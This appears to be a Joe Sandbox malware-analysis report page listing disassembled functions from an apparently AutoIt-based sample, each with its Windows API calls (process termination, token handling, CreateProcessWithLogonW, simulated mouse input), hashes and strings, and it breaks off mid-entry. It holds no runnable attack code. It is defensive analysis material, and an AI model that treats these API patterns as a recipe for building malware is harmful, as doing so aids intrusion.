Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
Instruction ID: 89638a8b0fabc1d7aa2c163c64b299bfd2c12b9f368aa67ba8840eaa113746d0
Opcode Fuzzy Hash: 403933c3fb8a3753a623bbdef988f7c02a745896c90ee42e4789a499c621cd92
Instruction Fuzzy Hash: 87414C34604240AFDB26CF28C499BD47BE1FB45310F5881AAE9488F6E2C739A896CB51

Function 0070709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00704E41,?,?,00000000,00000001), ref: 007070AC

Part of subcall function 007039A0: GetWindowRect.USER32(?,?), ref: 007039B3

GetDesktopWindow.USER32 ref: 007070D6
GetWindowRect.USER32(00000000), ref: 007070DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0070710F

Part of subcall function 006F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC

GetCursorPos.USER32(?), ref: 0070713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00707199

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ea387c2b92d303a2ef120c0fed89e2a67e0ec3939c0964ea725a27719fe31e28
Instruction ID: 77f64105e715cd125cbb72c73fafc1e1035d514b354ac33f0c178d62d2497b18
Opcode Fuzzy Hash: ea387c2b92d303a2ef120c0fed89e2a67e0ec3939c0964ea725a27719fe31e28
Instruction Fuzzy Hash: 0C31F272508309EBC724DF14C849B9BB7EAFFC8304F004A19F595971D1CA38EA19CB96

Function 006E8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E80C0
Part of subcall function 006E80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E80CA
Part of subcall function 006E80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E80D9
Part of subcall function 006E80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E80E0
Part of subcall function 006E80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E80F6

GetLengthSid.ADVAPI32(?,00000000,006E842F), ref: 006E88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 006E88D6
HeapAlloc.KERNEL32(00000000), ref: 006E88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 006E88F6
GetProcessHeap.KERNEL32(00000000,00000000,006E842F), ref: 006E890A
HeapFree.KERNEL32(00000000), ref: 006E8911

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: db0527703e71859d9e40a455707a8388702e06bff3afaf941e310680ac8cb814
Instruction ID: b8feae2b25d9a3c2287c88c390bfdd067bd8cd86f4222d44e5baad12db951d9c
Opcode Fuzzy Hash: db0527703e71859d9e40a455707a8388702e06bff3afaf941e310680ac8cb814
Instruction Fuzzy Hash: 3E11B131902309FFDB109FA9DC09BFE77AAEB44311F10C168E84997251DB369D04DB60

Function 006E85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006E85E2
OpenProcessToken.ADVAPI32(00000000), ref: 006E85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006E85F8
CloseHandle.KERNEL32(00000004), ref: 006E8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006E8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 006E8646

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
Instruction ID: 5b2ae842588e41dbaa8cfcbe6f61b215d1639bc68c67d688af8f099cc722f5c2
Opcode Fuzzy Hash: aa1271459a5f9192587c05b0a80659e5e40e8e7e6f5d2ad674ad3103406cef98
Instruction Fuzzy Hash: 5E115C72501249AFDF01CFA9DD49BDE7BB9EF48304F048064FE08A21A0C7758E61DB60

Function 006EB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 006EB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 006EB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006EB7CD
ReleaseDC.USER32(00000000,00000000), ref: 006EB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 006EB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 006EB7FE

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 740a3637af31a61fa173468f3976b25275bf775670c06b4f034f2d8d61595836
Instruction ID: c9d3fd6843c902f69fd94e7b49e13d5a7e0302c59274958023793f7e48e01ed2
Opcode Fuzzy Hash: 740a3637af31a61fa173468f3976b25275bf775670c06b4f034f2d8d61595836
Instruction Fuzzy Hash: 30018475E00309BBEF109BA69C45A9EBFB8EB48311F008076FA04A7291D6309C00CF95

Function 006B0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 006B0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 006B019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 006B01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 006B01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 006B01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 006B01C1

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
Instruction ID: 75088a9c96e027d7591fd6da29afa6d99cfb27887eb8c3f74ddd1fa4b82ae84c
Opcode Fuzzy Hash: 3b0e8b14e3a1b2e06fbbc44636c631f29efde770f95560b55bf368e8f9a20cc0
Instruction Fuzzy Hash: 8E016CB0901B59BDE3008F5A8C85B52FFA8FF19354F00411BE15C47941C7F5A864CBE5

Function 006F53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006F53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006F540F
GetWindowThreadProcessId.USER32(?,?), ref: 006F541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006F543E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
Instruction ID: 563115b353ea61201c852182003276db20f7b235442bdffc13023d6577894229
Opcode Fuzzy Hash: 037e4ba104e8ffc4c66e2c369eb63d7f31e621cc0db78b096531ce5c39741ddc
Instruction Fuzzy Hash: 6CF09032240558BBE3215BA6DC0DEEF7F7CEFC6B11F008169FA04D10A1D7A81A0186B9

Function 006F7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 006F7243
EnterCriticalSection.KERNEL32(?,?,006A0EE4,?,?), ref: 006F7254
TerminateThread.KERNEL32(00000000,000001F6,?,006A0EE4,?,?), ref: 006F7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,006A0EE4,?,?), ref: 006F726E

Part of subcall function 006F6C35: CloseHandle.KERNEL32(00000000,?,006F727B,?,006A0EE4,?,?), ref: 006F6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 006F7281
LeaveCriticalSection.KERNEL32(?,?,006A0EE4,?,?), ref: 006F7288

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
Instruction ID: fbba6d071da8879a5cf30f2820e7427e1db5af60c82b643d2cf69b441f1d2c36
Opcode Fuzzy Hash: 29d86d9ad2a8373712d796c51c7e79762ab70c4eda716d43fb41c9375e0659d4
Instruction Fuzzy Hash: 3DF08236544612EBD7511B68ED4D9EF773AFF55712B108632F603910E0CBBA5901CB54

Function 006E8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E899D
UnloadUserProfile.USERENV(?,?), ref: 006E89A9
CloseHandle.KERNEL32(?), ref: 006E89B2
CloseHandle.KERNEL32(?), ref: 006E89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 006E89C3
HeapFree.KERNEL32(00000000), ref: 006E89CA

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: e8abda6adec859afff0b14cd45038d73d96607f42ac2a6042144b2a3a650fa60
Instruction ID: ce77af4089731de237d61aec11c390d9b3a285fa87f90ba35f5c7d2c199b7464
Opcode Fuzzy Hash: e8abda6adec859afff0b14cd45038d73d96607f42ac2a6042144b2a3a650fa60
Instruction Fuzzy Hash: D0E0C236104405FBDA011FE9EC0C98ABF79FB89322B50C230F229810B0CB3A9820EB58

Function 006E7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7702
CLSIDFromProgID.OLE32(?,?,00000000,0071FB80,000000FF,?,00000000,00000800,00000000,?,00722C7C,?), ref: 006E7727
_memcmp.LIBCMT ref: 006E7748

Strings

,,r, xrefs: 006E753D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,r
API String ID: 314563124-1227627816
Opcode ID: a5400aaf95485c3016de9025b4d2096fbfbad3882865c02a0ae394e6bf6dcaf1
Instruction ID: 369ba486ee5610b7cba0104a95bfb933bb4444a32291b72f1fb77909e9fe0be8
Opcode Fuzzy Hash: a5400aaf95485c3016de9025b4d2096fbfbad3882865c02a0ae394e6bf6dcaf1
Instruction Fuzzy Hash: 69811E75A01209EFCF04DFA5C984EEEB7BAFF89315F204558E505AB250DB71AE06CB60

Function 007085ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00708613
CharUpperBuffW.USER32(?,?), ref: 00708722
VariantClear.OLEAUT32(?), ref: 0070889A

Part of subcall function 006F7562: VariantInit.OLEAUT32(00000000), ref: 006F75A2
Part of subcall function 006F7562: VariantCopy.OLEAUT32(00000000,?), ref: 006F75AB
Part of subcall function 006F7562: VariantClear.OLEAUT32(00000000), ref: 006F75B7

Strings

AUTOIT.ERROR, xrefs: 00708728
Incorrect Parameter format, xrefs: 0070864B, 0070880D

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 189aac47f911c6b264241173cec376e2d41fa5a9311c60c6b894d8efc817e460
Instruction ID: 1e07783689036d0e5cfb37bba53d1f87dc6885e4170c278f6e5098f912cb9363
Opcode Fuzzy Hash: 189aac47f911c6b264241173cec376e2d41fa5a9311c60c6b894d8efc817e460
Instruction Fuzzy Hash: 4391A270604301DFCB90DF24C48595AB7F9EF89714F148A2EF89A8B3A2DB35E905CB52

Function 006F2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9

_memset.LIBCMT ref: 006F2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006F2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006F2C97

Strings

0, xrefs: 006F2B73

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 58bae386f3a26864505ac3e7759bea40ae41ad0ab13ff3b6097b82d2d2cedc7b
Instruction ID: 07a50702555ce023683742feb93ef88309d27f18db6e2c67457ed477de5290f2
Opcode Fuzzy Hash: 58bae386f3a26864505ac3e7759bea40ae41ad0ab13ff3b6097b82d2d2cedc7b
Instruction Fuzzy Hash: 7A51FE7110830A9AD7A49F28C861ABFBBEAEF44310F040A2DFA91D3290DB64CC458F56

Function 006A3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006A3277
_memmove.LIBCMT ref: 006A3310
_free.LIBCMT ref: 006A3336
_memmove.LIBCMT ref: 006A33E9

Strings

3cj, xrefs: 006A3225
_j, xrefs: 006A3322

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cj$_j
API String ID: 2620147621-2927472950
Opcode ID: f1bcac8dd5596e51e020a5f06897c308e9ede575c9fcb84a4c1c10d67d595aac
Instruction ID: 2c41fbd4a5f9660cfb534765d44b36c09b93ce1c8aab2d5f7c3e7f09e54e6729
Opcode Fuzzy Hash: f1bcac8dd5596e51e020a5f06897c308e9ede575c9fcb84a4c1c10d67d595aac
Instruction Fuzzy Hash: C0513871A083518FDB65DF28C451AAABBE6EF8A310F08492DF98987351DB31ED41CF42

Function 006A6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006A6248
_memmove.LIBCMT ref: 006A62E4
_memset.LIBCMT ref: 006A6308

Strings

ERCP, xrefs: 006A61B3
3cj, xrefs: 006A62AF

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cj$ERCP
API String ID: 2532777613-987588500
Opcode ID: 76946dbd6511156c856a5fcf3db1629d22fb1541a4f179def994a6318a286177
Instruction ID: 45fca35c46b25d70fe836206724e2887dc3d5a95ad41ecfa5b3eb147a9577f89
Opcode Fuzzy Hash: 76946dbd6511156c856a5fcf3db1629d22fb1541a4f179def994a6318a286177
Instruction Fuzzy Hash: 18519E71A00305DBDB24DF65C8817EABBE6EF05314F24456EE54ACB240E770AA81CF50

Function 006F2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006F27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 006F2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00755890,00000000), ref: 006F286B

Strings

0, xrefs: 006F27B5

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: f97c089507206cf2ca00c65db4d15e984f52ef5fcfea80d370e87526bc9c6d74
Instruction ID: 7aad2956d94de607100a14a324bc0ce4c319d1f73f74a1f2b1c01972418bc294
Opcode Fuzzy Hash: f97c089507206cf2ca00c65db4d15e984f52ef5fcfea80d370e87526bc9c6d74
Instruction Fuzzy Hash: CA41B1702043069FD720DF28C895BAABBEAEF85354F04492DF66597391D730A809CB56

Function 0070D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070D7C5

Part of subcall function 0069784B: _memmove.LIBCMT ref: 00697899

Strings

winapi, xrefs: 0070D836
none, xrefs: 0070D8A0
stdcall, xrefs: 0070D847
cdecl, xrefs: 0070D81C

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 349e8f94807fe5562628ac15a1998d8fde7dc85ef68425d26887fec644ac9e22
Instruction ID: f330de0e5f7b785039b4b47487c3975951d785bc69e8249716343f86e8f33536
Opcode Fuzzy Hash: 349e8f94807fe5562628ac15a1998d8fde7dc85ef68425d26887fec644ac9e22
Instruction Fuzzy Hash: 8031BE71914219EBDF10EFA4C8519EEB7FAFF00320B108B29E826976D1DB35AD05CB80

Function 006E8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22

Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006E8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006E8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 006E8F57

Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06

Strings

ListBox, xrefs: 006E8ED3
ComboBox, xrefs: 006E8E9E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
